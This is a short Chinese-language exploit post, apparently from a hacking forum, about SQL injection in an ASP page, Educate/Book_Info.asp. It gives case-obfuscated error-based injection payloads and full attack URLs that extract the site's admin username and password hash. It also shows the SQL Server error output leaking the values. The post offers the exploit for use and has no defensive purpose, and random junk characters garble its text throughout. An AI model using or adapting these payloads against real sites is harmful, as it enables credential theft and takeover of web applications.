漏洞出现在Educate/Book_Info.asp ! q; o& I8 V- g3 U& W5 l, r: ~
6 N6 r+ \/ w0 {( ]此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出) r8 D/ O' T% p
: P+ d+ N) q! l7 e8 jexp:如下
% S( f/ D3 n& z6 K查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 ?3 R8 r1 H; J2 k
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
* e' M g/ E& z9 x
& `6 k/ Z5 I t& }# ^7 Ihttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper): T l9 }$ @2 [" ?! c9 J8 g
- R9 T4 g8 _. A j$ VMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
% i. W' X+ m9 r7 q% U# o% L 3 _( C$ s- A& ?+ X0 H5 u P, d7 a
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。$ T9 I+ {7 W& e3 ~
3 `$ a9 G5 C" }+ S/Educate/Book_Info.asp,行 8, T& r6 A: s% Z/ R6 n* Y
: a! Z4 q2 W Q) }9 R9 B/ r
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)* i; R# g/ i3 y/ K( ]4 ^! F
+ j" V* M" w; O( S/ ]
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
% W& Y T: e3 y s" P9 V$ h& P
' ~7 o& V/ V' o) r( G; i4 T: t将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。2 ^1 n, R& j& D
0 H+ x5 N' x7 ^1 J' q5 I; c
/Educate/Book_Info.asp,行 86 Q1 ]( D2 j9 [0 n: g3 e; s
|